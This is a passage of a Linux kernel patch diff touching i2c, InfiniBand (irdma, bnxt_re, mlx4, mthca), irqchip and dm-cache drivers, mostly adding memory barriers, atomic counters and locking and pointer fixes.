+-
+-	return ret;
+ }
+ 
+ static void nmk_i2c_remove(struct amba_device *adev)
+ {
+-	struct resource *res = &adev->res;
+ 	struct nmk_i2c_dev *dev = amba_get_drvdata(adev);
+ 
+ 	i2c_del_adapter(&dev->adap);
+@@ -1066,8 +1048,6 @@ static void nmk_i2c_remove(struct amba_device *adev)
+ 	clear_all_interrupts(dev);
+ 	/* disable the controller */
+ 	i2c_clr_bit(dev->virtbase + I2C_CR, I2C_CR_PE);
+-	clk_disable_unprepare(dev->clk);
+-	release_mem_region(res->start, resource_size(res));
+ }
+ 
+ static struct i2c_vendor_data vendor_stn8815 = {
+diff --git a/drivers/i2c/busses/i2c-sh7760.c b/drivers/i2c/busses/i2c-sh7760.c
+index 319d1fa617c88..051b904cb35f6 100644
+--- a/drivers/i2c/busses/i2c-sh7760.c
++++ b/drivers/i2c/busses/i2c-sh7760.c
+@@ -443,9 +443,8 @@ static int sh7760_i2c_probe(struct platform_device *pdev)
+ 		goto out0;
+ 	}
+ 
+-	id = kzalloc(sizeof(struct cami2c), GFP_KERNEL);
++	id = kzalloc(sizeof(*id), GFP_KERNEL);
+ 	if (!id) {
+-		dev_err(&pdev->dev, "no mem for private data\n");
+ 		ret = -ENOMEM;
+ 		goto out0;
+ 	}
+diff --git a/drivers/i2c/busses/i2c-tiny-usb.c b/drivers/i2c/busses/i2c-tiny-usb.c
+index 7279ca0eaa2d0..d1fa9ff5aeab4 100644
+--- a/drivers/i2c/busses/i2c-tiny-usb.c
++++ b/drivers/i2c/busses/i2c-tiny-usb.c
+@@ -226,10 +226,8 @@ static int i2c_tiny_usb_probe(struct usb_interface *interface,
+ 
+ 	/* allocate memory for our device state and initialize it */
+ 	dev = kzalloc(sizeof(*dev), GFP_KERNEL);
+-	if (dev == NULL) {
+-		dev_err(&interface->dev, "Out of memory\n");
++	if (!dev)
+ 		goto error;
+-	}
+ 
+ 	dev->usb_dev = usb_get_dev(interface_to_usbdev(interface));
+ 	dev->interface = interface;
+diff --git a/drivers/infiniband/hw/bnxt_re/ib_verbs.c b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+index 94222de1d3719..4ed8814efde6f 100644
+--- a/drivers/infiniband/hw/bnxt_re/ib_verbs.c
++++ b/drivers/infiniband/hw/bnxt_re/ib_verbs.c
+@@ -796,7 +796,10 @@ fail:
+ int bnxt_re_destroy_qp(struct ib_qp *ib_qp, struct ib_udata *udata)
+ {
+ 	struct bnxt_re_qp *qp = container_of(ib_qp, struct bnxt_re_qp, ib_qp);
++	struct bnxt_qplib_qp *qplib_qp = &qp->qplib_qp;
+ 	struct bnxt_re_dev *rdev = qp->rdev;
++	struct bnxt_qplib_nq *scq_nq = NULL;
++	struct bnxt_qplib_nq *rcq_nq = NULL;
+ 	unsigned int flags;
+ 	int rc;
+ 
+@@ -830,6 +833,15 @@ int bnxt_re_destroy_qp(struct ib_qp *ib_qp, struct ib_udata *udata)
+ 	ib_umem_release(qp->rumem);
+ 	ib_umem_release(qp->sumem);
+ 
++	/* Flush all entries of the notification queues
++	 * associated with the given qp.
++	 */
++	scq_nq = qplib_qp->scq->nq;
++	rcq_nq = qplib_qp->rcq->nq;
++	bnxt_re_synchronize_nq(scq_nq);
++	if (scq_nq != rcq_nq)
++		bnxt_re_synchronize_nq(rcq_nq);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_fp.c b/drivers/infiniband/hw/bnxt_re/qplib_fp.c
+index 74d56900387a1..1011293547ef7 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_fp.c
++++ b/drivers/infiniband/hw/bnxt_re/qplib_fp.c
+@@ -387,6 +387,24 @@ static void bnxt_qplib_service_nq(struct tasklet_struct *t)
+ 	spin_unlock_bh(&hwq->lock);
+ }
+ 
++/* bnxt_re_synchronize_nq - self-poll the notification queue.
++ * @nq      -     notification queue pointer
++ *
++ * This function polls a given notification queue and processes
++ * all of its pending entries.
++ * It is useful for synchronizing notification entries while resources
++ * are going away.
++ */
++
++void bnxt_re_synchronize_nq(struct bnxt_qplib_nq *nq)
++{
++	int budget = nq->budget;
++
++	nq->budget = nq->hwq.max_elements;
++	bnxt_qplib_service_nq(&nq->nq_tasklet);
++	nq->budget = budget;
++}
++
+ static irqreturn_t bnxt_qplib_nq_irq(int irq, void *dev_instance)
+ {
+ 	struct bnxt_qplib_nq *nq = dev_instance;
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_fp.h b/drivers/infiniband/hw/bnxt_re/qplib_fp.h
+index f859710f9a7f4..49d89c0808275 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_fp.h
++++ b/drivers/infiniband/hw/bnxt_re/qplib_fp.h
+@@ -548,6 +548,7 @@ int bnxt_qplib_process_flush_list(struct bnxt_qplib_cq *cq,
+ 				  struct bnxt_qplib_cqe *cqe,
+ 				  int num_cqes);
+ void bnxt_qplib_flush_cqn_wq(struct bnxt_qplib_qp *qp);
++void bnxt_re_synchronize_nq(struct bnxt_qplib_nq *nq);
+ 
+ static inline void *bnxt_qplib_get_swqe(struct bnxt_qplib_q *que, u32 *swq_idx)
+ {
+diff --git a/drivers/infiniband/hw/irdma/ctrl.c b/drivers/infiniband/hw/irdma/ctrl.c
+index a41e0d21143ae..6544c9c60b7db 100644
+--- a/drivers/infiniband/hw/irdma/ctrl.c
++++ b/drivers/infiniband/hw/irdma/ctrl.c
+@@ -2693,13 +2693,13 @@ static int irdma_sc_cq_modify(struct irdma_sc_cq *cq,
+  */
+ void irdma_check_cqp_progress(struct irdma_cqp_timeout *timeout, struct irdma_sc_dev *dev)
+ {
+-	if (timeout->compl_cqp_cmds != dev->cqp_cmd_stats[IRDMA_OP_CMPL_CMDS]) {
+-		timeout->compl_cqp_cmds = dev->cqp_cmd_stats[IRDMA_OP_CMPL_CMDS];
++	u64 completed_ops = atomic64_read(&dev->cqp->completed_ops);
++
++	if (timeout->compl_cqp_cmds != completed_ops) {
++		timeout->compl_cqp_cmds = completed_ops;
+ 		timeout->count = 0;
+-	} else {
+-		if (dev->cqp_cmd_stats[IRDMA_OP_REQ_CMDS] !=
+-		    timeout->compl_cqp_cmds)
+-			timeout->count++;
++	} else if (timeout->compl_cqp_cmds != dev->cqp->requested_ops) {
++		timeout->count++;
+ 	}
+ }
+ 
+@@ -2742,7 +2742,7 @@ static int irdma_cqp_poll_registers(struct irdma_sc_cqp *cqp, u32 tail,
+ 		if (newtail != tail) {
+ 			/* SUCCESS */
+ 			IRDMA_RING_MOVE_TAIL(cqp->sq_ring);
+-			cqp->dev->cqp_cmd_stats[IRDMA_OP_CMPL_CMDS]++;
++			atomic64_inc(&cqp->completed_ops);
+ 			return 0;
+ 		}
+ 		udelay(cqp->dev->hw_attrs.max_sleep_count);
+@@ -3102,8 +3102,8 @@ int irdma_sc_cqp_init(struct irdma_sc_cqp *cqp,
+ 	info->dev->cqp = cqp;
+ 
+ 	IRDMA_RING_INIT(cqp->sq_ring, cqp->sq_size);
+-	cqp->dev->cqp_cmd_stats[IRDMA_OP_REQ_CMDS] = 0;
+-	cqp->dev->cqp_cmd_stats[IRDMA_OP_CMPL_CMDS] = 0;
++	cqp->requested_ops = 0;
++	atomic64_set(&cqp->completed_ops, 0);
+ 	/* for the cqp commands backlog. */
+ 	INIT_LIST_HEAD(&cqp->dev->cqp_cmd_head);
+ 
+@@ -3255,7 +3255,7 @@ __le64 *irdma_sc_cqp_get_next_send_wqe_idx(struct irdma_sc_cqp *cqp, u64 scratch
+ 	if (ret_code)
+ 		return NULL;
+ 
+-	cqp->dev->cqp_cmd_stats[IRDMA_OP_REQ_CMDS]++;
++	cqp->requested_ops++;
+ 	if (!*wqe_idx)
+ 		cqp->polarity = !cqp->polarity;
+ 	wqe = cqp->sq_base[*wqe_idx].elem;
+@@ -3344,6 +3344,9 @@ int irdma_sc_ccq_get_cqe_info(struct irdma_sc_cq *ccq,
+ 	if (polarity != ccq->cq_uk.polarity)
+ 		return -ENOENT;
+ 
++	/* Ensure CEQE contents are read after valid bit is checked */
++	dma_rmb();
++
+ 	get_64bit_val(cqe, 8, &qp_ctx);
+ 	cqp = (struct irdma_sc_cqp *)(unsigned long)qp_ctx;
+ 	info->error = (bool)FIELD_GET(IRDMA_CQ_ERROR, temp);
+@@ -3378,7 +3381,7 @@ int irdma_sc_ccq_get_cqe_info(struct irdma_sc_cq *ccq,
+ 	dma_wmb(); /* make sure shadow area is updated before moving tail */
+ 
+ 	IRDMA_RING_MOVE_TAIL(cqp->sq_ring);
+-	ccq->dev->cqp_cmd_stats[IRDMA_OP_CMPL_CMDS]++;
++	atomic64_inc(&cqp->completed_ops);
+ 
+ 	return ret_code;
+ }
+@@ -3990,13 +3993,17 @@ int irdma_sc_get_next_aeqe(struct irdma_sc_aeq *aeq,
+ 	u8 polarity;
+ 
+ 	aeqe = IRDMA_GET_CURRENT_AEQ_ELEM(aeq);
+-	get_64bit_val(aeqe, 0, &compl_ctx);
+ 	get_64bit_val(aeqe, 8, &temp);
+ 	polarity = (u8)FIELD_GET(IRDMA_AEQE_VALID, temp);
+ 
+ 	if (aeq->polarity != polarity)
+ 		return -ENOENT;
+ 
++	/* Ensure AEQE contents are read after valid bit is checked */
++	dma_rmb();
++
++	get_64bit_val(aeqe, 0, &compl_ctx);
++
+ 	print_hex_dump_debug("WQE: AEQ_ENTRY WQE", DUMP_PREFIX_OFFSET, 16, 8,
+ 			     aeqe, 16, false);
+ 
+diff --git a/drivers/infiniband/hw/irdma/defs.h b/drivers/infiniband/hw/irdma/defs.h
+index c1906cab5c8ad..ad54260cb58c9 100644
+--- a/drivers/infiniband/hw/irdma/defs.h
++++ b/drivers/infiniband/hw/irdma/defs.h
+@@ -190,32 +190,30 @@ enum irdma_cqp_op_type {
+ 	IRDMA_OP_MANAGE_VF_PBLE_BP		= 25,
+ 	IRDMA_OP_QUERY_FPM_VAL			= 26,
+ 	IRDMA_OP_COMMIT_FPM_VAL			= 27,
+-	IRDMA_OP_REQ_CMDS			= 28,
+-	IRDMA_OP_CMPL_CMDS			= 29,
+-	IRDMA_OP_AH_CREATE			= 30,
+-	IRDMA_OP_AH_MODIFY			= 31,
+-	IRDMA_OP_AH_DESTROY			= 32,
+-	IRDMA_OP_MC_CREATE			= 33,
+-	IRDMA_OP_MC_DESTROY			= 34,
+-	IRDMA_OP_MC_MODIFY			= 35,
+-	IRDMA_OP_STATS_ALLOCATE			= 36,
+-	IRDMA_OP_STATS_FREE			= 37,
+-	IRDMA_OP_STATS_GATHER			= 38,
+-	IRDMA_OP_WS_ADD_NODE			= 39,
+-	IRDMA_OP_WS_MODIFY_NODE			= 40,
+-	IRDMA_OP_WS_DELETE_NODE			= 41,
+-	IRDMA_OP_WS_FAILOVER_START		= 42,
+-	IRDMA_OP_WS_FAILOVER_COMPLETE		= 43,
+-	IRDMA_OP_SET_UP_MAP			= 44,
+-	IRDMA_OP_GEN_AE				= 45,
+-	IRDMA_OP_QUERY_RDMA_FEATURES		= 46,
+-	IRDMA_OP_ALLOC_LOCAL_MAC_ENTRY		= 47,
+-	IRDMA_OP_ADD_LOCAL_MAC_ENTRY		= 48,
+-	IRDMA_OP_DELETE_LOCAL_MAC_ENTRY		= 49,
+-	IRDMA_OP_CQ_MODIFY			= 50,
++	IRDMA_OP_AH_CREATE			= 28,
++	IRDMA_OP_AH_MODIFY			= 29,
++	IRDMA_OP_AH_DESTROY			= 30,
++	IRDMA_OP_MC_CREATE			= 31,
++	IRDMA_OP_MC_DESTROY			= 32,
++	IRDMA_OP_MC_MODIFY			= 33,
++	IRDMA_OP_STATS_ALLOCATE			= 34,
++	IRDMA_OP_STATS_FREE			= 35,
++	IRDMA_OP_STATS_GATHER			= 36,
++	IRDMA_OP_WS_ADD_NODE			= 37,
++	IRDMA_OP_WS_MODIFY_NODE			= 38,
++	IRDMA_OP_WS_DELETE_NODE			= 39,
++	IRDMA_OP_WS_FAILOVER_START		= 40,
++	IRDMA_OP_WS_FAILOVER_COMPLETE		= 41,
++	IRDMA_OP_SET_UP_MAP			= 42,
++	IRDMA_OP_GEN_AE				= 43,
++	IRDMA_OP_QUERY_RDMA_FEATURES		= 44,
++	IRDMA_OP_ALLOC_LOCAL_MAC_ENTRY		= 45,
++	IRDMA_OP_ADD_LOCAL_MAC_ENTRY		= 46,
++	IRDMA_OP_DELETE_LOCAL_MAC_ENTRY		= 47,
++	IRDMA_OP_CQ_MODIFY			= 48,
+ 
+ 	/* Must be last entry*/
+-	IRDMA_MAX_CQP_OPS			= 51,
++	IRDMA_MAX_CQP_OPS			= 49,
+ };
+ 
+ /* CQP SQ WQES */
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index 43dfa4761f069..c07ce85d243f1 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -191,6 +191,7 @@ static void irdma_set_flush_fields(struct irdma_sc_qp *qp,
+ 	case IRDMA_AE_AMP_MWBIND_INVALID_RIGHTS:
+ 	case IRDMA_AE_AMP_MWBIND_BIND_DISABLED:
+ 	case IRDMA_AE_AMP_MWBIND_INVALID_BOUNDS:
++	case IRDMA_AE_AMP_MWBIND_VALID_STAG:
+ 		qp->flush_code = FLUSH_MW_BIND_ERR;
+ 		qp->event_type = IRDMA_QP_EVENT_ACCESS_ERR;
+ 		break;
+@@ -2068,7 +2069,7 @@ void irdma_cqp_ce_handler(struct irdma_pci_f *rf, struct irdma_sc_cq *cq)
+ 			cqp_request->compl_info.error = info.error;
+ 
+ 			if (cqp_request->waiting) {
+-				cqp_request->request_done = true;
++				WRITE_ONCE(cqp_request->request_done, true);
+ 				wake_up(&cqp_request->waitq);
+ 				irdma_put_cqp_request(&rf->cqp, cqp_request);
+ 			} else {
+diff --git a/drivers/infiniband/hw/irdma/main.h b/drivers/infiniband/hw/irdma/main.h
+index 65e966ad34530..e64205839d039 100644
+--- a/drivers/infiniband/hw/irdma/main.h
++++ b/drivers/infiniband/hw/irdma/main.h
+@@ -159,8 +159,8 @@ struct irdma_cqp_request {
+ 	void (*callback_fcn)(struct irdma_cqp_request *cqp_request);
+ 	void *param;
+ 	struct irdma_cqp_compl_info compl_info;
++	bool request_done; /* READ/WRITE_ONCE macros operate on it */
+ 	bool waiting:1;
+-	bool request_done:1;
+ 	bool dynamic:1;
+ };
+ 
+diff --git a/drivers/infiniband/hw/irdma/puda.c b/drivers/infiniband/hw/irdma/puda.c
+index 4ec9639f1bdbf..562531712ea44 100644
+--- a/drivers/infiniband/hw/irdma/puda.c
++++ b/drivers/infiniband/hw/irdma/puda.c
+@@ -230,6 +230,9 @@ static int irdma_puda_poll_info(struct irdma_sc_cq *cq,
+ 	if (valid_bit != cq_uk->polarity)
+ 		return -ENOENT;
+ 
++	/* Ensure CQE contents are read after valid bit is checked */
++	dma_rmb();
++
+ 	if (cq->dev->hw_attrs.uk_attrs.hw_rev >= IRDMA_GEN_2)
+ 		ext_valid = (bool)FIELD_GET(IRDMA_CQ_EXTCQE, qword3);
+ 
+@@ -243,6 +246,9 @@ static int irdma_puda_poll_info(struct irdma_sc_cq *cq,
+ 		if (polarity != cq_uk->polarity)
+ 			return -ENOENT;
+ 
++		/* Ensure ext CQE contents are read after ext valid bit is checked */
++		dma_rmb();
++
+ 		IRDMA_RING_MOVE_HEAD_NOCHECK(cq_uk->cq_ring);
+ 		if (!IRDMA_RING_CURRENT_HEAD(cq_uk->cq_ring))
+ 			cq_uk->polarity = !cq_uk->polarity;
+diff --git a/drivers/infiniband/hw/irdma/type.h b/drivers/infiniband/hw/irdma/type.h
+index 517d41a1c2894..d6cb94dc744c5 100644
+--- a/drivers/infiniband/hw/irdma/type.h
++++ b/drivers/infiniband/hw/irdma/type.h
+@@ -410,6 +410,8 @@ struct irdma_sc_cqp {
+ 	struct irdma_dcqcn_cc_params dcqcn_params;
+ 	__le64 *host_ctx;
+ 	u64 *scratch_array;
++	u64 requested_ops;
++	atomic64_t completed_ops;
+ 	u32 cqp_id;
+ 	u32 sq_size;
+ 	u32 hw_sq_size;
+diff --git a/drivers/infiniband/hw/irdma/uk.c b/drivers/infiniband/hw/irdma/uk.c
+index dd428d915c175..280d633d4ec4f 100644
+--- a/drivers/infiniband/hw/irdma/uk.c
++++ b/drivers/infiniband/hw/irdma/uk.c
+@@ -1161,7 +1161,7 @@ int irdma_uk_cq_poll_cmpl(struct irdma_cq_uk *cq,
+ 	}
+ 	wqe_idx = (u32)FIELD_GET(IRDMA_CQ_WQEIDX, qword3);
+ 	info->qp_handle = (irdma_qp_handle)(unsigned long)qp;
+-	info->op_type = (u8)FIELD_GET(IRDMA_CQ_SQ, qword3);
++	info->op_type = (u8)FIELD_GET(IRDMACQ_OP, qword3);
+ 
+ 	if (info->q_type == IRDMA_CQE_QTYPE_RQ) {
+ 		u32 array_idx;
+@@ -1527,6 +1527,9 @@ void irdma_uk_clean_cq(void *q, struct irdma_cq_uk *cq)
+ 		if (polarity != temp)
+ 			break;
+ 
++		/* Ensure CQE contents are read after valid bit is checked */
++		dma_rmb();
++
+ 		get_64bit_val(cqe, 8, &comp_ctx);
+ 		if ((void *)(unsigned long)comp_ctx == q)
+ 			set_64bit_val(cqe, 8, 0);
+diff --git a/drivers/infiniband/hw/irdma/utils.c b/drivers/infiniband/hw/irdma/utils.c
+index 7887230c867b1..8c7617776e58b 100644
+--- a/drivers/infiniband/hw/irdma/utils.c
++++ b/drivers/infiniband/hw/irdma/utils.c
+@@ -481,7 +481,7 @@ void irdma_free_cqp_request(struct irdma_cqp *cqp,
+ 	if (cqp_request->dynamic) {
+ 		kfree(cqp_request);
+ 	} else {
+-		cqp_request->request_done = false;
++		WRITE_ONCE(cqp_request->request_done, false);
+ 		cqp_request->callback_fcn = NULL;
+ 		cqp_request->waiting = false;
+ 
+@@ -515,7 +515,7 @@ irdma_free_pending_cqp_request(struct irdma_cqp *cqp,
+ {
+ 	if (cqp_request->waiting) {
+ 		cqp_request->compl_info.error = true;
+-		cqp_request->request_done = true;
++		WRITE_ONCE(cqp_request->request_done, true);
+ 		wake_up(&cqp_request->waitq);
+ 	}
+ 	wait_event_timeout(cqp->remove_wq,
+@@ -567,11 +567,11 @@ static int irdma_wait_event(struct irdma_pci_f *rf,
+ 	bool cqp_error = false;
+ 	int err_code = 0;
+ 
+-	cqp_timeout.compl_cqp_cmds = rf->sc_dev.cqp_cmd_stats[IRDMA_OP_CMPL_CMDS];
++	cqp_timeout.compl_cqp_cmds = atomic64_read(&rf->sc_dev.cqp->completed_ops);
+ 	do {
+ 		irdma_cqp_ce_handler(rf, &rf->ccq.sc_cq);
+ 		if (wait_event_timeout(cqp_request->waitq,
+-				       cqp_request->request_done,
++				       READ_ONCE(cqp_request->request_done),
+ 				       msecs_to_jiffies(CQP_COMPL_WAIT_TIME_MS)))
+ 			break;
+ 
+diff --git a/drivers/infiniband/hw/mlx4/qp.c b/drivers/infiniband/hw/mlx4/qp.c
+index 488c906c0432c..ac479e81ddee8 100644
+--- a/drivers/infiniband/hw/mlx4/qp.c
++++ b/drivers/infiniband/hw/mlx4/qp.c
+@@ -530,15 +530,15 @@ static int set_qp_rss(struct mlx4_ib_dev *dev, struct mlx4_ib_rss *rss_ctx,
+ 		return (-EOPNOTSUPP);
+ 	}
+ 
+-	if (ucmd->rx_hash_fields_mask & ~(MLX4_IB_RX_HASH_SRC_IPV4	|
+-					  MLX4_IB_RX_HASH_DST_IPV4	|
+-					  MLX4_IB_RX_HASH_SRC_IPV6	|
+-					  MLX4_IB_RX_HASH_DST_IPV6	|
+-					  MLX4_IB_RX_HASH_SRC_PORT_TCP	|
+-					  MLX4_IB_RX_HASH_DST_PORT_TCP	|
+-					  MLX4_IB_RX_HASH_SRC_PORT_UDP	|
+-					  MLX4_IB_RX_HASH_DST_PORT_UDP  |
+-					  MLX4_IB_RX_HASH_INNER)) {
++	if (ucmd->rx_hash_fields_mask & ~(u64)(MLX4_IB_RX_HASH_SRC_IPV4	|
++					       MLX4_IB_RX_HASH_DST_IPV4	|
++					       MLX4_IB_RX_HASH_SRC_IPV6	|
++					       MLX4_IB_RX_HASH_DST_IPV6	|
++					       MLX4_IB_RX_HASH_SRC_PORT_TCP |
++					       MLX4_IB_RX_HASH_DST_PORT_TCP |
++					       MLX4_IB_RX_HASH_SRC_PORT_UDP |
++					       MLX4_IB_RX_HASH_DST_PORT_UDP |
++					       MLX4_IB_RX_HASH_INNER)) {
+ 		pr_debug("RX Hash fields_mask has unsupported mask (0x%llx)\n",
+ 			 ucmd->rx_hash_fields_mask);
+ 		return (-EOPNOTSUPP);
+diff --git a/drivers/infiniband/hw/mthca/mthca_qp.c b/drivers/infiniband/hw/mthca/mthca_qp.c
+index 69bba0ef4a5df..53f43649f7d08 100644
+--- a/drivers/infiniband/hw/mthca/mthca_qp.c
++++ b/drivers/infiniband/hw/mthca/mthca_qp.c
+@@ -1393,7 +1393,7 @@ int mthca_alloc_sqp(struct mthca_dev *dev,
+ 	if (mthca_array_get(&dev->qp_table.qp, mqpn))
+ 		err = -EBUSY;
+ 	else
+-		mthca_array_set(&dev->qp_table.qp, mqpn, qp->sqp);
++		mthca_array_set(&dev->qp_table.qp, mqpn, qp);
+ 	spin_unlock_irq(&dev->qp_table.lock);
+ 
+ 	if (err)
+diff --git a/drivers/irqchip/irq-bcm6345-l1.c b/drivers/irqchip/irq-bcm6345-l1.c
+index 6899e37810a88..b14c74f7b9b98 100644
+--- a/drivers/irqchip/irq-bcm6345-l1.c
++++ b/drivers/irqchip/irq-bcm6345-l1.c
+@@ -82,6 +82,7 @@ struct bcm6345_l1_chip {
+ };
+ 
+ struct bcm6345_l1_cpu {
++	struct bcm6345_l1_chip	*intc;
+ 	void __iomem		*map_base;
+ 	unsigned int		parent_irq;
+ 	u32			enable_cache[];
+@@ -115,17 +116,11 @@ static inline unsigned int cpu_for_irq(struct bcm6345_l1_chip *intc,
+ 
+ static void bcm6345_l1_irq_handle(struct irq_desc *desc)
+ {
+-	struct bcm6345_l1_chip *intc = irq_desc_get_handler_data(desc);
+-	struct bcm6345_l1_cpu *cpu;
++	struct bcm6345_l1_cpu *cpu = irq_desc_get_handler_data(desc);
++	struct bcm6345_l1_chip *intc = cpu->intc;
+ 	struct irq_chip *chip = irq_desc_get_chip(desc);
+ 	unsigned int idx;
+ 
+-#ifdef CONFIG_SMP
+-	cpu = intc->cpus[cpu_logical_map(smp_processor_id())];
+-#else
+-	cpu = intc->cpus[0];
+-#endif
+-
+ 	chained_irq_enter(chip, desc);
+ 
+ 	for (idx = 0; idx < intc->n_words; idx++) {
+@@ -253,6 +248,7 @@ static int __init bcm6345_l1_init_one(struct device_node *dn,
+ 	if (!cpu)
+ 		return -ENOMEM;
+ 
++	cpu->intc = intc;
+ 	cpu->map_base = ioremap(res.start, sz);
+ 	if (!cpu->map_base)
+ 		return -ENOMEM;
+@@ -268,7 +264,7 @@ static int __init bcm6345_l1_init_one(struct device_node *dn,
+ 		return -EINVAL;
+ 	}
+ 	irq_set_chained_handler_and_data(cpu->parent_irq,
+-						bcm6345_l1_irq_handle, intc);
++						bcm6345_l1_irq_handle, cpu);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c
+index 973ede0197e36..8956881503d9a 100644
+--- a/drivers/irqchip/irq-gic-v3-its.c
++++ b/drivers/irqchip/irq-gic-v3-its.c
+@@ -271,13 +271,23 @@ static void vpe_to_cpuid_unlock(struct its_vpe *vpe, unsigned long flags)
+ 	raw_spin_unlock_irqrestore(&vpe->vpe_lock, flags);
+ }
+ 
++static struct irq_chip its_vpe_irq_chip;
++
+ static int irq_to_cpuid_lock(struct irq_data *d, unsigned long *flags)
+ {
+-	struct its_vlpi_map *map = get_vlpi_map(d);
++	struct its_vpe *vpe = NULL;
+ 	int cpu;
+ 
+-	if (map) {
+-		cpu = vpe_to_cpuid_lock(map->vpe, flags);
++	if (d->chip == &its_vpe_irq_chip) {
++		vpe = irq_data_get_irq_chip_data(d);
++	} else {
++		struct its_vlpi_map *map = get_vlpi_map(d);
++		if (map)
++			vpe = map->vpe;
++	}
++
++	if (vpe) {
++		cpu = vpe_to_cpuid_lock(vpe, flags);
+ 	} else {
+ 		/* Physical LPIs are already locked via the irq_desc lock */
+ 		struct its_device *its_dev = irq_data_get_irq_chip_data(d);
+@@ -291,10 +301,18 @@ static int irq_to_cpuid_lock(struct irq_data *d, unsigned long *flags)
+ 
+ static void irq_to_cpuid_unlock(struct irq_data *d, unsigned long flags)
+ {
+-	struct its_vlpi_map *map = get_vlpi_map(d);
++	struct its_vpe *vpe = NULL;
++
++	if (d->chip == &its_vpe_irq_chip) {
++		vpe = irq_data_get_irq_chip_data(d);
++	} else {
++		struct its_vlpi_map *map = get_vlpi_map(d);
++		if (map)
++			vpe = map->vpe;
++	}
+ 
+-	if (map)
+-		vpe_to_cpuid_unlock(map->vpe, flags);
++	if (vpe)
++		vpe_to_cpuid_unlock(vpe, flags);
+ }
+ 
+ static struct its_collection *valid_col(struct its_collection *col)
+@@ -1431,14 +1449,29 @@ static void wait_for_syncr(void __iomem *rdbase)
+ 		cpu_relax();
+ }
+ 
+-static void direct_lpi_inv(struct irq_data *d)
++static void __direct_lpi_inv(struct irq_data *d, u64 val)
+ {
+-	struct its_vlpi_map *map = get_vlpi_map(d);
+ 	void __iomem *rdbase;
+ 	unsigned long flags;
+-	u64 val;
+ 	int cpu;
+ 
++	/* Target the redistributor this LPI is currently routed to */
++	cpu = irq_to_cpuid_lock(d, &flags);
++	raw_spin_lock(&gic_data_rdist_cpu(cpu)->rd_lock);
++
++	rdbase = per_cpu_ptr(gic_rdists->rdist, cpu)->rd_base;
++	gic_write_lpir(val, rdbase + GICR_INVLPIR);
++	wait_for_syncr(rdbase);
++
++	raw_spin_unlock(&gic_data_rdist_cpu(cpu)->rd_lock);
++	irq_to_cpuid_unlock(d, flags);
++}
++
++static void direct_lpi_inv(struct irq_data *d)
++{
++	struct its_vlpi_map *map = get_vlpi_map(d);
++	u64 val;
++
+ 	if (map) {
+ 		struct its_device *its_dev = irq_data_get_irq_chip_data(d);
+ 
+@@ -1451,15 +1484,7 @@ static void direct_lpi_inv(struct irq_data *d)
+ 		val = d->hwirq;
+ 	}
+ 
+-	/* Target the redistributor this LPI is currently routed to */
+-	cpu = irq_to_cpuid_lock(d, &flags);
+-	raw_spin_lock(&gic_data_rdist_cpu(cpu)->rd_lock);
+-	rdbase = per_cpu_ptr(gic_rdists->rdist, cpu)->rd_base;
+-	gic_write_lpir(val, rdbase + GICR_INVLPIR);
+-
+-	wait_for_syncr(rdbase);
+-	raw_spin_unlock(&gic_data_rdist_cpu(cpu)->rd_lock);
+-	irq_to_cpuid_unlock(d, flags);
++	__direct_lpi_inv(d, val);
+ }
+ 
+ static void lpi_update_config(struct irq_data *d, u8 clr, u8 set)
+@@ -3941,18 +3966,10 @@ static void its_vpe_send_inv(struct irq_data *d)
+ {
+ 	struct its_vpe *vpe = irq_data_get_irq_chip_data(d);
+ 
+-	if (gic_rdists->has_direct_lpi) {
+-		void __iomem *rdbase;
+-
+-		/* Target the redistributor this VPE is currently known on */
+-		raw_spin_lock(&gic_data_rdist_cpu(vpe->col_idx)->rd_lock);
+-		rdbase = per_cpu_ptr(gic_rdists->rdist, vpe->col_idx)->rd_base;
+-		gic_write_lpir(d->parent_data->hwirq, rdbase + GICR_INVLPIR);
+-		wait_for_syncr(rdbase);
+-		raw_spin_unlock(&gic_data_rdist_cpu(vpe->col_idx)->rd_lock);
+-	} else {
++	if (gic_rdists->has_direct_lpi)
++		__direct_lpi_inv(d, d->parent_data->hwirq);
++	else
+ 		its_vpe_send_cmd(vpe, its_send_inv);
+-	}
+ }
+ 
+ static void its_vpe_mask_irq(struct irq_data *d)
+diff --git a/drivers/md/dm-cache-policy-smq.c b/drivers/md/dm-cache-policy-smq.c
+index 54343812223e8..c983cf240632e 100644
+--- a/drivers/md/dm-cache-policy-smq.c
++++ b/drivers/md/dm-cache-policy-smq.c
+@@ -855,7 +855,13 @@ struct smq_policy {
+ 
+ 	struct background_tracker *bg_work;
+ 
+-	bool migrations_allowed;
++	bool migrations_allowed:1;
++
++	/*
++	 * If this is set, the policy will try to clean the whole cache
++	 * even if the device is not idle.
++	 */
++	bool cleaner:1;
+ };
+ 
+ /*----------------------------------------------------------------*/
+@@ -1136,7 +1142,7 @@ static bool clean_target_met(struct smq_policy *mq, bool idle)
+ 	 * Cache entries may not be populated.  So we cannot rely on the
+ 	 * size of the clean queue.
+ 	 */
+-	if (idle) {
++	if (idle || mq->cleaner) {
+ 		/*
+ 		 * We'd like to clean everything.
+ 		 */
+@@ -1719,11 +1725,9 @@ static void calc_hotspot_params(sector_t origin_size,
+ 		*hotspot_block_size /= 2u;
+ }
+ 
+-static struct dm_cache_policy *__smq_create(dm_cblock_t cache_size,
+-					    sector_t origin_size,
+-					    sector_t cache_block_size,
+-					    bool mimic_mq,
+-					    bool migrations_allowed)
++static struct dm_cache_policy *
++__smq_create(dm_cblock_t cache_size, sector_t origin_size, sector_t cache_block_size,
++	     bool mimic_mq, bool migrations_allowed, bool cleaner)
+ {
+ 	unsigned int i;
+ 	unsigned int nr_sentinels_per_queue = 2u * NR_CACHE_LEVELS;
+@@ -1810,6 +1814,7 @@ static struct dm_cache_policy *__smq_create(dm_cblock_t cache_size,
+ 		goto bad_btracker;
+ 
+ 	mq->migrations_allowed = migrations_allowed;
++	mq->cleaner = cleaner;
+ 
+ 	return &mq->policy;
+ 
+@@ -1833,21 +1838,24 @@ static struct dm_cache_policy *smq_create(dm_cblock_t cache_size,
